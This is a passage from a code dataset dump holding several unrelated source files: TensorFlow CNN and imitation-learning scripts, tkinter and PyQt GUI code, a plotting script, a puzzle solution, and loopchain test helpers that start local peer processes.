shape의 데이터를 불러올 수 있음\r\nX_img = tf.reshape(X, [-1, 64, 64, 1]) # img 64x64x1 (black/white)\r\nY = tf.placeholder(dtype=tf.float32, shape=[None, 2])\r\n\r\n\r\n################### Layer 1 ###################\r\nW1 = tf.Variable(tf.random_normal([3, 3, 1, 32], stddev=0.01))\r\nL1 = tf.nn.conv2d(X_img, W1, strides=[1, 1, 1, 1], padding='SAME')\r\n# feature map: (64, 64, 1) 32개\r\nL1 = tf.layers.batch_normalization(L1, center=True, scale=True, training=batch_prob) # 
배치정규화\r\nL1 = tf.nn.relu(L1) # 활성화 함수로 렐루 사용\r\nL1 = tf.nn.dropout(L1, keep_prob)\r\nL1 = tf.nn.max_pool(L1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\r\n# 출력 feature map: (32, 32, 1) 32개\r\n\r\n\r\n################### Layer 2 ###################\r\nW2 = tf.Variable(tf.random_normal([3, 3, 32, 64], stddev=0.01))\r\nL2 = tf.nn.conv2d(L1, W2, strides=[1, 1, 1, 1], padding='SAME')\r\n# feature map: (32, 32, 1) 64개\r\nL2 = tf.layers.batch_normalization(L2, center=True, scale=True, training=batch_prob)\r\nL2 = tf.nn.relu(L2)\r\nL2 = tf.nn.dropout(L2, keep_prob)\r\nL2 = tf.nn.max_pool(L2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\r\n# 출력 feature map: (16, 16, 1) 64개\r\n\r\n\r\n################### Layer 3 ###################\r\nW3 = tf.Variable(tf.random_normal([3, 3, 64, 128], stddev=0.01))\r\nL3 = tf.nn.conv2d(L2, W3, strides=[1, 1, 1, 1], padding='SAME')\r\n# feature map: (16, 16, 1) 128개\r\nL3 = tf.layers.batch_normalization(L3, center=True, scale=True, training=batch_prob)\r\nL3 = tf.nn.relu(L3)\r\nL3 = tf.nn.dropout(L3, keep_prob)\r\n# L3 = tf.nn.max_pool(L3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\r\n\r\n\r\nL3_flat = tf.reshape(L3, [-1, 16 * 16 * 128]) # 다시 평평하게\r\nW4 = tf.get_variable(\"W4\", shape=[16 * 16 * 128, 2], initializer=tf.contrib.layers.xavier_initializer())\r\n\r\n\r\n# set bias of filter\r\nb = tf.Variable(tf.random_normal([2]))\r\nlogits = tf.matmul(L3_flat, W4) + b\r\n\r\n# define cost function\r\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=Y))\r\n# loss function을 최소화하는 경사하강법 종류 중 adam optimizer 을 사용\r\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\r\n\r\n\r\n# initialize\r\nsess = tf.Session()\r\nsess.run(tf.global_variables_initializer()) # 모든 변수의 weight값을 초기화 합니다.\r\n# result = sess.run(W1)\r\n# print('필터:', result)\r\n\r\n\r\n# train my model\r\nprint('Learning started. 
It takes sometime.')\r\n\r\nfor epoch in range(training_epochs):\r\n avg_cost = 0\r\n total_batch = int(len(train_input) / batch_size) # 8320 / 128 = 65\r\n\r\n for i in range(total_batch):\r\n start = ((i + 1) * batch_size) - batch_size # 0, 128, 256..\r\n end = ((i + 1) * batch_size) # 128, 256, 512..\r\n batch_xs = train_input[start:end]\r\n batch_ys = train_label[start:end]\r\n feed_dict = {X: batch_xs, Y: batch_ys, batch_prob: True, keep_prob: 0.8}\r\n c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)\r\n avg_cost += c / total_batch\r\n\r\n if (epoch+1) % 10 == 0:\r\n print('Epoch:', '%04d' % (epoch + 1), ' cost =', '{:.9f}'.format(avg_cost))\r\n\r\nprint('Learning Finished!')\r\n\r\n\r\n# # Test model and check accuracy\r\n# correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(Y, 1))\r\n# accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n# print('Accuracy:', sess.run(accuracy, feed_dict={X: test_input, Y: test_label, batch_prob: False, keep_prob: 1}))\r\n\r\n\r\n# Test model and check accuracy\r\ncorrect_prediction = logits\r\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\na = sess.run(correct_prediction, feed_dict={X: test_input, batch_prob: False, keep_prob: 1})\r\n\r\n\r\n# 소프트맥스 함수\r\ndef softmax(a):\r\n c = np.max(a)\r\n exp_a = np.exp(a - c)\r\n sum_exp_a = np.sum(exp_a)\r\n y = exp_a / sum_exp_a\r\n\r\n return y\r\n\r\n\r\npredict_result = []\r\n\r\nfor i in range(len(a)):\r\n predict_result.append(np.argmax(a[i]))\r\n\r\n\r\n# for i in range(len(a)):\r\n# sm = softmax(a[i])\r\n# print(a[i], sm)\r\n# predict_result.append(np.argmax(sm))\r\n\r\n\r\ncorrect = 0\r\n\r\nfor i in predict_result[:100]:\r\n if i == 0:\r\n correct += 1\r\n\r\nfor i in predict_result[100:]:\r\n if i == 1:\r\n correct += 1\r\n\r\nprint('acc:', round(correct/200 * 100, 2), '%')\r\nprint('not elijah:', predict_result[:100].count(0), '개 / 100개 맞춤', \"\\n\",\r\n 'elijah:', predict_result[100:].count(1), '개 / 100개 맞춤')\r\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"415816455","text":"from tkinter import *\nfrom tkinter import messagebox\n\nwindow = Tk()\nwindow.title(\"Practica de creación de menu\")\n\ndef infoAdicional():\n\tmessagebox.showinfo(\"Procesador de juan\", \"Procesador de textos version 2019\")\n\ndef avisoLicencia():\n\tmessagebox.showwarning(\"Licencia\", \"Producto bajo licencia GNU\")\n\ndef salirAplicacion():\n\t# valor = messagebox.askquestion(\"Salir\", \"¿Desea salir de la aplicación?\") # SI Y NO\n\t# if (valor == 'yes'):\n\t# \twindow.destroy()\n\n\tvalor = messagebox.askokcancel(\"Salir\", \"¿Desea salir de la aplicación?\") # OK Y CANCEL\n\tif (valor == True):\n\t\twindow.destroy()\n\ndef cerrarDocumento():\n\tvalor = messagebox.askretrycancel(\"Reintentar\", \"No es posible cerrar. 
Documento bloqueado\") # reintentar Y CANCEL\n\nbarraMenu = Menu(window)\nwindow.config(menu=barraMenu, width=300, height=300)\n\narchivoMenu = Menu(barraMenu, tearoff=0)\narchivoMenu.add_command(label=\"Nuevo\")\narchivoMenu.add_command(label=\"Guardar\")\narchivoMenu.add_command(label=\"Guardar como\")\narchivoMenu.add_separator()\narchivoMenu.add_command(label=\"Cerrar\", command=cerrarDocumento)\narchivoMenu.add_command(label=\"Salir\", command=salirAplicacion)\n\narchivoEdicion = Menu(barraMenu, tearoff=0)\narchivoEdicion.add_command(label=\"Copiar\")\narchivoEdicion.add_command(label=\"Cortar\")\narchivoEdicion.add_command(label=\"Pegar\")\n\narchivoHerramientas = Menu(barraMenu, tearoff=0)\narchivoAyuda = Menu(barraMenu, tearoff=0)\narchivoAyuda.add_command(label=\"Licencia\", command=avisoLicencia)\narchivoAyuda.add_command(label=\"Acerca de\", command=infoAdicional)\n\nbarraMenu.add_cascade(label=\"Archivo\", menu=archivoMenu)\nbarraMenu.add_cascade(label=\"Edicion\", menu=archivoEdicion)\nbarraMenu.add_cascade(label=\"Herramientas\", menu=archivoHerramientas)\nbarraMenu.add_cascade(label=\"Ayuda\", menu=archivoAyuda)\n\n\nwindow.mainloop()","sub_path":"53.GUI/ventanasEmergentes.pyw","file_name":"ventanasEmergentes.pyw","file_ext":"pyw","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"267510727","text":"import os\n\nsource = 'SplitShow.tex'\n\nenv = Environment(ENV = os.environ)\nenv.Append(BUILDERS = {'PDFOpen': Builder(action = 'open -a SplitShow $SOURCE', src_suffix = '.pdf')})\n\npdf = env.PDFOpen(env.PDF(source))\n\n# clean out beamer-specific files\nClean(pdf, [source.rsplit('.',1)[0] + ext for ext in Split('.nav .out .snm .toc')])\n","sub_path":"doc/screenshot/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"407818503","text":"#!/usr/bin/env python\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef main():\n h, city, data_y1, data_y2 = extract_data(sys.argv[1])\n\n plot_bar_graph(h, data_y1, data_y2, city)\n\ndef extract_data(path):\n city_name = []\n year1_data = []\n year2_data = []\n \n in_file = open(path)\n header = in_file.next()\n \n for row in in_file: \n row = row.strip(\"\\n\").split(\",\")\n city_name.append(row[0])\n year1_data.append(int(row[1]))\n year2_data.append(int(row[2]))\n\n return header, city_name, year1_data, year2_data \n\ndef plot_bar_graph(header, data1, data2, city):\n num_bars = len(data1)\n bar_loc = np.arange(num_bars)\n bar_wid = 0.15\n\n fig, ax = plt.subplots()\n\n r1 = ax.bar(bar_loc, data1, bar_wid, color='y')\n r2 = ax.bar(bar_loc + bar_wid, data1, bar_wid, color='b')\n\n # add some text for labels, title and axes ticks\n ax.set_ylabel('ELECTRICITY')\n ax.set_title(' Bar chart of electricity supply in 1996 and 2011')\n ax.set_xticklabels(city)\n ax.legend((r1[0], r2[0]), ('1996', '2011'))\n fig.autofmt_xdate() \n plt.tight_layout()\n plt.show()\n\nif __name__ == \"__main__\":\n main()\nelse: pass\n","sub_path":"Py/DATAMANIPUlATION/Data_Processing_and_Plotting01/plot_electricity.py","file_name":"plot_electricity.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"595851114","text":"from Прочее.truck import Truck\n\nclass NotMachineLikeTruckAcceptableInGarage:\n\n text = '''\n 
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n !!! Only truck acceptable to insert in garage {} !!!!!!\n !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n '''\n\n def __init__(self, message):\n self.message = NotMachineLikeTruckAcceptableInGarage.text.format(message)\n\nclass Garage:\n\n def __init__(self, number, volume, list1, list2):\n self.number = number\n self.volume = volume\n self.cars_list = list1\n self.trucks_list = list2\n\n def setTrucks(self, trucks):\n for truck in trucks:\n if (isinstance(truck, Truck)):\n self.trucks_list.append(truck)\n else:\n raise NotMachineL","sub_path":"pvinogradov/Cls/garage.py","file_name":"garage.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"473489770","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /users/payno/.local/share/virtualenvs/tomwer_venc/lib/python3.7/site-packages/tomwer/gui/reconstruction/ftserie/reconsparamseditor/paganinwidget.py\n# Compiled at: 2019-12-11 09:05:53\n# Size of source mod 2**32: 14605 bytes\n__author__ = [\n 'H. Payno']\n__license__ = 'MIT'\n__date__ = '10/01/2018'\nfrom silx.gui import qt\nfrom tomwer.core.log import TomwerLogger\nfrom tomwer.core.process.reconstruction.ftseries.params.paganin import PaganinMode\nfrom tomwer.core.utils.char import BETA_CHAR, DELTA_CHAR\nfrom tomwer.gui.reconstruction.ftserie.h5editor import H5StructEditor\nfrom tomwer.gui.utils.inputwidget import SelectionLineEdit\nfrom tomwer.synctools.ftseries import _QPaganinRP, QReconsParams\nlogger = TomwerLogger(__name__)\n\nclass PaganinWidget(H5StructEditor, qt.QWidget):\n __doc__ = '\\n Definition of the tab enabling Paganin reconstruction parameters edition\\n\\n :param reconsparams: reconstruction parameters edited by the widget\\n '\n\n def __init__(self, reconsparams, parent=None):\n qt.QWidget.__init__(self, parent=parent)\n H5StructEditor.__init__(self, structID='PAGANIN')\n self._recons_params = None\n self.setReconsParams(recons_params=reconsparams)\n self._groupHideIfNotMulti = []\n self._groupHideIfOff = []\n self.setLayout(qt.QVBoxLayout())\n self._PaganinWidget__buildMode()\n self._PaganinWidget__buildUnsharp()\n self._PaganinWidget__buildThreshold()\n self._PaganinWidget__buildDilate()\n self._PaganinWidget__buildMedianMedianFilterSize()\n self._PaganinWidget__buidMKeep()\n self._PaganinWidget__updatePaganinMode(0)\n spacer = qt.QWidget(self)\n spacer.setSizePolicy(qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n self.layout().addWidget(spacer)\n self._makeConnection()\n\n def setReconsParams(self, recons_params):\n if isinstance(recons_params, QReconsParams):\n _recons_params = recons_params.paganin\n else:\n if isinstance(recons_params, _QPaganinRP):\n _recons_params = recons_params\n else:\n raise ValueError('recons_params should be an instance of QReconsParam or _QPaganinRP')\n if self._recons_params:\n self._recons_params.sigChanged.disconnect(self._update_params)\n self._recons_params = _recons_params\n self.load(self._recons_params)\n self._recons_params.sigChanged.connect(self._update_params)\n\n def _update_params(self):\n \"\"\"Update all parameter\"\"\"\n self.load(self._recons_params)\n\n def clear(self):\n pass\n\n def _makeConnection(self):\n self._qcbpaganin.currentIndexChanged.connect(self._modeChanged)\n 
self._qleSigmaBeta.editingFinished.connect(self._DBChanged)\n self._qleSigmaBeta2.editingFinished.connect(self._DB2Changed)\n self._unsharp_sigma_coeff.editingFinished.connect(self._unsharpCoeffChanged)\n self._unsharp_sigma_mask_value.editingFinished.connect(self._unsharpSigmachanged)\n self._qleThreshold.editingFinished.connect(self._thresholdChanged)\n self._qleDilatation.editingFinished.connect(self._dilateChanged)\n self._qleMedianFilterSize.editingFinished.connect(self._medianRChanged)\n self._qcbKeepBone.toggled.connect(self._keepBoneChanged)\n self._qcbKeepSoft.toggled.connect(self._keepSoftChanged)\n self._qcbKeepAbs.toggled.connect(self._keepAbsChanged)\n self._qcbKeepCorr.toggled.connect(self._keepCorrChanged)\n self._qcbKeepMask.toggled.connect(self._keepMaskChanged)\n\n def __buildMode(self):\n widget = qt.QWidget(self)\n widget.setLayout(qt.QGridLayout())\n self._qcbpaganin = qt.QComboBox(self)\n self._qcbpaganin.setSizePolicy(qt.QSizePolicy.Expanding, qt.QSizePolicy.Minimum)\n for mode in PaganinMode:\n self._qcbpaganin.addItem(mode.name)\n\n widget.layout().addWidget(qt.QLabel('Mode', parent=widget), 0, 0)\n widget.layout().addWidget(self._qcbpaganin, 0, 1)\n self._qcbpaganin.currentIndexChanged.connect(self._PaganinWidget__updatePaganinMode)\n self.linkComboboxWithH5Variable((self._qcbpaganin), 'MODE',\n fitwithindex=True)\n self._buildAlphaBetaWidgets(widget)\n self.layout().addWidget(widget)\n self._groupHideIfOff.append(self.paganinModeOpt)\n\n def _buildAlphaBetaWidgets(self, widget):\n self.paganinModeOpt = qt.QWidget(widget)\n self.paganinModeOpt.setLayout(qt.QGridLayout())\n label = DELTA_CHAR + ' / ' + BETA_CHAR\n self.paganinModeOpt.layout().addWidget(qt.QLabel(label, parent=widget), 1, 0)\n self._qleSigmaBeta = qt.QLineEdit('0', self)\n self.paganinModeOpt.layout().addWidget(self._qleSigmaBeta, 1, 1)\n self.LinkLineEditWithH5Variable(self._qleSigmaBeta, 'DB', float)\n label_multi = DELTA_CHAR + ' / ' + BETA_CHAR + ' (multi)'\n lMulti = qt.QLabel(label_multi, parent=widget)\n self.paganinModeOpt.layout().addWidget(lMulti)\n self._qleSigmaBeta2 = qt.QLineEdit('0', self)\n self.paganinModeOpt.layout().addWidget(self._qleSigmaBeta2, 2, 1)\n self.LinkLineEditWithH5Variable(self._qleSigmaBeta2, 'DB2', float)\n self._groupHideIfNotMulti.append(lMulti)\n self._groupHideIfNotMulti.append(self._qleSigmaBeta2)\n widget.layout().addWidget(self.paganinModeOpt, 1, 1)\n\n def _modeChanged(self):\n value = self._qcbpaganin.currentIndex()\n assert isinstance(self._recons_params, _QPaganinRP)\n self._recons_params['MODE'] = value\n\n def _DBChanged(self):\n value = float(self._qleSigmaBeta.text())\n self._recons_params['DB'] = value\n\n def _DB2Changed(self):\n value = float(self._qleSigmaBeta2.text())\n self._recons_params['DB2'] = value\n\n def __buildUnsharp(self):\n self._unsharp_group = qt.QGroupBox(title='unsharp mask parameters', parent=self)\n self.layout().addWidget(self._unsharp_group)\n self._unsharp_group.setLayout(qt.QGridLayout())\n label = 'mask ' + DELTA_CHAR + ' value in pixels'\n self._unsharp_group.layout().addWidget(qt.QLabel(label), 0, 0)\n self._unsharp_sigma_coeff = qt.QLineEdit('0', self._unsharp_group)\n self._unsharp_group.layout().addWidget(self._unsharp_sigma_coeff, 0, 1)\n self.LinkLineEditWithH5Variable(self._unsharp_sigma_coeff, 'UNSHARP_COEFF', float)\n self._unsharp_group.layout().addWidget(qt.QLabel('coefficient '), 1, 0)\n self._unsharp_sigma_mask_value = qt.QLineEdit('0', self._unsharp_group)\n validator = 
qt.QDoubleValidator(parent=(self._unsharp_sigma_mask_value))\n self._unsharp_sigma_mask_value.setValidator(validator)\n self._unsharp_group.layout().addWidget(self._unsharp_sigma_mask_value, 1, 1)\n self.LinkLineEditWithH5Variable(self._unsharp_sigma_mask_value, 'UNSHARP_SIGMA', float)\n self.layout().addWidget(self._unsharp_group)\n self._groupHideIfOff.append(self._unsharp_group)\n\n def _unsharpCoeffChanged(self):\n value = float(self._unsharp_sigma_coeff.text())\n self._recons_params['UNSHARP_COEFF'] = value\n\n def _unsharpSigmachanged(self):\n value = float(self._unsharp_sigma_mask_value.text())\n self._recons_params['UNSHARP_SIGMA'] = value\n\n def __buildThreshold(self):\n widget = qt.QWidget(self)\n widget.setLayout(qt.QHBoxLayout())\n widget.layout().addWidget(qt.QLabel('Threshold for high absorption mask', parent=widget))\n self._qleThreshold = qt.QLineEdit('0', widget)\n widget.layout().addWidget(self._qleThreshold)\n self.LinkLineEditWithH5Variable(self._qleThreshold, 'THRESHOLD', float)\n self.layout().addWidget(widget)\n self._groupHideIfNotMulti.append(widget)\n self._groupHideIfOff.append(widget)\n\n def _thresholdChanged(self):\n value = float(self._qleThreshold.text())\n self._recons_params['THRESHOLD'] = value\n\n def __buildDilate(self):\n widget = qt.QWidget(self)\n widget.setLayout(qt.QHBoxLayout())\n widget.layout().addWidget(qt.QLabel('Dilatation to cover the dark fringes', parent=widget))\n self._qleDilatation = qt.QLineEdit('0', parent=widget)\n widget.layout().addWidget(self._qleDilatation)\n self.LinkLineEditWithH5Variable(self._qleDilatation, 'DILATE', int)\n self.layout().addWidget(widget)\n self._groupHideIfNotMulti.append(widget)\n self._groupHideIfOff.append(widget)\n\n def _dilateChanged(self):\n value = int(self._qleDilatation.text())\n self._recons_params['DILATE'] = value\n\n def __buildMedianMedianFilterSize(self):\n widget = qt.QWidget(self)\n widget.setLayout(qt.QHBoxLayout())\n widget.layout().addWidget(qt.QLabel('Median filter size', parent=widget))\n self._qleMedianFilterSize = qt.QLineEdit('', parent=widget)\n widget.layout().addWidget(self._qleMedianFilterSize)\n self.LinkLineEditWithH5Variable(self._qleMedianFilterSize, 'MEDIANR', int)\n self.layout().addWidget(widget)\n self._groupHideIfNotMulti.append(widget)\n self._groupHideIfOff.append(widget)\n\n def _medianRChanged(self):\n value = int(self._qleMedianFilterSize.text())\n self._recons_params['MEDIANR'] = value\n\n def __buidMKeep(self):\n widget = qt.QWidget(self)\n widget.setLayout(qt.QVBoxLayout())\n self._qcbKeepBone = qt.QCheckBox('Keep a separate volume for high absorption part', parent=widget)\n widget.layout().addWidget(self._qcbKeepBone)\n self.linkCheckboxWithH5Variable(self._qcbKeepBone, 'MKEEP_BONE')\n self._qcbKeepSoft = qt.QCheckBox('Keep a separate volume for low absorption part', parent=widget)\n widget.layout().addWidget(self._qcbKeepSoft)\n self.linkCheckboxWithH5Variable(self._qcbKeepSoft, 'MKEEP_SOFT')\n self._qcbKeepAbs = qt.QCheckBox('Keep a separate volume for absorption reconstruction', parent=widget)\n widget.layout().addWidget(self._qcbKeepAbs)\n self.linkCheckboxWithH5Variable(self._qcbKeepAbs, 'MKEEP_ABS')\n self._qcbKeepCorr = qt.QCheckBox('Keep binary mask (bone absorption - average neighbours)', parent=widget)\n widget.layout().addWidget(self._qcbKeepCorr)\n self.linkCheckboxWithH5Variable(self._qcbKeepCorr, 'MKEEP_CORR')\n self._qcbKeepMask = qt.QCheckBox('Keep the binary mask', parent=widget)\n widget.layout().addWidget(self._qcbKeepMask)\n 
self.linkCheckboxWithH5Variable(self._qcbKeepMask, 'MKEEP_MASK')\n self.layout().addWidget(widget)\n self._groupHideIfNotMulti.append(widget)\n self._groupHideIfOff.append(widget)\n\n def _keepBoneChanged(self, b):\n self._recons_params['MKEEP_BONE'] = b\n\n def _keepSoftChanged(self, b):\n self._recons_params['MKEEP_SOFT'] = b\n\n def _keepAbsChanged(self, b):\n self._recons_params['MKEEP_ABS'] = b\n\n def _keepCorrChanged(self, b):\n self._recons_params['MKEEP_CORR'] = b\n\n def _keepMaskChanged(self, b):\n self._recons_params['MKEEP_MASK'] = b\n\n def getPaganinMode(self):\n return self._qcbpaganin.currentText()\n\n def __updatePaganinMode(self, newindex):\n [widget.setVisible(newindex is not 0) for widget in self._groupHideIfOff]\n [widget.setVisible(newindex is 3) for widget in self._groupHideIfNotMulti]\n\n\nclass PaganinRangeWidget(PaganinWidget):\n\n def _buildAlphaBetaWidgets(self, widget):\n self.paganinModeOpt = qt.QWidget(widget)\n self.paganinModeOpt.setLayout(qt.QGridLayout())\n label = DELTA_CHAR + ' / ' + BETA_CHAR\n self.paganinModeOpt.layout().addWidget(qt.QLabel(label, parent=widget), 1, 0)\n self._qleSigmaBeta = SelectionLineEdit(text='0', parent=self)\n self.paganinModeOpt.layout().addWidget(self._qleSigmaBeta, 1, 1)\n self.LinkSelectionLineEditWithH5Variable(self._qleSigmaBeta, 'DB', str)\n label_multi = DELTA_CHAR + ' / ' + BETA_CHAR + ' (multi)'\n lMulti = qt.QLabel(label_multi, parent=widget)\n self.paganinModeOpt.layout().addWidget(lMulti)\n self._qleSigmaBeta2 = SelectionLineEdit(text='0', parent=self)\n self.paganinModeOpt.layout().addWidget(self._qleSigmaBeta2, 2, 1)\n self.LinkSelectionLineEditWithH5Variable(self._qleSigmaBeta2, 'DB2', str)\n self._groupHideIfNotMulti.append(lMulti)\n self._groupHideIfNotMulti.append(self._qleSigmaBeta2)\n widget.layout().addWidget(self.paganinModeOpt, 1, 1)\n\n def _DBChanged(self):\n value = self._qleSigmaBeta.selection\n self._recons_params['DB'] = value\n\n def _DB2Changed(self):\n value = self._qleSigmaBeta2.selection\n self._recons_params['DB2'] = value","sub_path":"pycfiles/tomwer-0.4.0.linux-x86_64.tar/paganinwidget.cpython-37.py","file_name":"paganinwidget.cpython-37.py","file_ext":"py","file_size_in_byte":12914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"375351235","text":"#!/usr/bin/env python\n\"\"\"Train a model to predict actions given observations\n Parameters: Filename of pickled dictionary with keys \"observations\", \"actions\"\n\"\"\"\n\n\nimport pickle\nimport tensorflow as tf\nimport numpy as np\n\n\ndef model(observations, actions, dirName):\n Label_Dimension=actions.shape[1]\n Feature_Dimension=observations.shape[1]\n\n feature_column = [tf.contrib.layers.real_valued_column(\"\", dimension=Feature_Dimension)]\n\n estimator = tf.contrib.learn.DNNRegressor(\n feature_columns=feature_column,\n hidden_units=[64,64],\n #activation_fn = tf.nn.relu,\n activation_fn = tf.tanh,\n model_dir = \"./trained/\"+dirName,\n label_dimension=Label_Dimension\n )\n\n def input_fn_train(): # returns x, Y \n return {\"\": tf.constant(observations, dtype=tf.float32)}, \\\n tf.constant(actions, dtype=tf.float32)\n\n print(\"shape of observations\", observations.shape, \"shape of actions \", actions.shape)\n estimator.fit(input_fn=input_fn_train, steps = 3000)\n print(\"fitting done\")\n # check how well the model fits the training data\n ev = estimator.evaluate(input_fn=input_fn_train, steps = 2)\n loss_score = ev[\"loss\"]\n print(\"Loss: 
{0:f}\".format(loss_score))\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('expert_policy_file', type=str)\n\n args = parser.parse_args()\n\n data = pickle.load(open(\"./trainingData/\"+args.expert_policy_file, \"rb\"))\n\n observations = data[\"observations\"]\n actions = np.squeeze(data[\"actions\"])\n print(\"observations.shape \", observations.shape)\n print(\"actions.shape \", actions.shape)\n\n tf.logging.set_verbosity(tf.logging.INFO)\n\n model(observations, actions, args.expert_policy_file)\n\nif __name__ == '__main__':\n main()\n","sub_path":"hw1/ImitationLearning.py","file_name":"ImitationLearning.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"534286141","text":"'''\n#include\nint main()\n{\n int n,i,j,arr[902],pre[901],ans=0;\n scanf(\"%d%d\",&n,&arr[0]);\n pre[0]=arr[0];\n for(i=1;ians)\n ans=pre[i]^(pre[j]-pre[k]);\n if((arr[i]^(pre[j]-pre[k]))>ans)\n ans=arr[i]^(pre[j]-pre[k]);\n }\n}\n}\nprintf(\"%d\",ans);\nreturn 0;\n}\n4\n1 2 1 3\n'''\nnoe = int(input())\npre = [0] * (noe + 1)\narr = [int(x) for x in input().split()]\npre[0] = arr[0]\nfor i in range(1, noe):\n pre[i] = arr[i] + pre[i-1]\nans = 0\nfor i in range(1, noe-1):\n for j in range(i+1, noe):\n for k in range(i, j):\n var1 = pre[i] ^ (pre[j] - pre[k])\n ans = max(ans, var1)\n print(var1, ans, pre[i], pre[j], pre[k])\n var2 = arr[i] ^ (pre[j] - pre[k])\n ans = max(ans, var2)\n print(var2, ans)\nprint(ans)\n\n\n\n","sub_path":"HackerEarth/subham_and_subarray_xor.py","file_name":"subham_and_subarray_xor.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"392407405","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright 2018 ICON Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"util functions for unittest\"\"\"\n\nimport asyncio\nimport json\nimport logging\nimport os\nimport random\nimport time\nfrom sys import platform\n\nimport loopchain\nimport loopchain.utils as util\nfrom loopchain import configure as conf\nfrom loopchain.baseservice import StubManager, CommonSubprocess\nfrom loopchain.blockchain.blocks import Block\nfrom loopchain.blockchain.transactions import Transaction, TransactionBuilder, TransactionVersioner\nfrom loopchain.blockchain.types import Address\nfrom loopchain.components import SingletonMetaClass\nfrom loopchain.peer import Signer\nfrom loopchain.protos import loopchain_pb2, loopchain_pb2_grpc\nfrom loopchain.store.key_value_store import KeyValueStoreError, KeyValueStore\nfrom loopchain.utils import loggers\nfrom loopchain.utils.message_queue import StubCollection\n\nloggers.set_preset_type(loggers.PresetType.develop)\nloggers.update_preset()\n\n\ndef run_peer_server_as_process(port, radiostation_port=conf.PORT_RADIOSTATION, group_id=None, score=None):\n args = ['python3', 'loopchain.py', 'peer', '-d', '-p', str(port),\n 
'-r', f\"{util.get_private_ip()}:{radiostation_port}\"]\n logging.debug(f\"run_peer_server_as_process ({args})\")\n return CommonSubprocess(args)\n\n\ndef run_peer_server_as_process_and_stub(\n port, radiostation_port=conf.PORT_RADIOSTATION, group_id=None, score=None, timeout=None, wait=True):\n if timeout is None:\n timeout = conf.TIMEOUT_FOR_PEER_INIT\n\n process = run_peer_server_as_process(port, radiostation_port, group_id, score)\n\n async def _wait():\n StubCollection().amqp_target = conf.AMQP_TARGET\n StubCollection().amqp_key = f\"{util.get_private_ip()}:{port}\"\n\n logging.debug(f'{StubCollection().amqp_key} peer hello')\n\n await StubCollection().create_peer_stub()\n await StubCollection().peer_stub.async_task().hello()\n\n logging.debug(f'{StubCollection().amqp_key} peer hello complete')\n\n if wait:\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n try:\n future = asyncio.ensure_future(_wait())\n loop.run_until_complete(future)\n loop.stop()\n loop.close()\n except Exception as e:\n logging.warning(f\"Exception in loop : {e}\")\n\n stub, channel = util.get_stub_to_server(f\"localhost:{port}\", stub_class=loopchain_pb2_grpc.PeerServiceStub)\n return process, stub\n\n\ndef run_peer_server_as_process_and_stub_manager(\n port, radiostation_port=conf.PORT_RADIOSTATION, group_id=None, score=None, timeout=None):\n process = run_peer_server_as_process(port, radiostation_port, group_id, score)\n stub_manager = StubManager(f\"localhost:{port}\", loopchain_pb2_grpc.PeerServiceStub, ssl_auth_type=conf.GRPC_SSL_TYPE)\n return process, stub_manager\n\n\ndef run_radio_station_as_process(port):\n args = ['python3', 'loopchain.py', 'rs', '-d', '-p', str(port)]\n logging.debug(f\"run_radio_station_as_process ({args})\")\n return CommonSubprocess(args)\n\n\ndef run_radio_station_as_process_and_stub_manager(port, timeout=None):\n process = run_radio_station_as_process(port)\n stub_manager = StubManager(f\"localhost:{port}\",\n loopchain_pb2_grpc.RadioStationStub,\n conf.GRPC_SSL_TYPE)\n util.request_server_in_time(stub_manager.stub.GetStatus, loopchain_pb2.StatusRequest(request=\"\"))\n return process, stub_manager\n\n\ndef run_radio_station_as_process_and_stub(port):\n process = run_radio_station_as_process(port)\n\n stub, channel = util.get_stub_to_server(\n target=f\"localhost:{port}\",\n 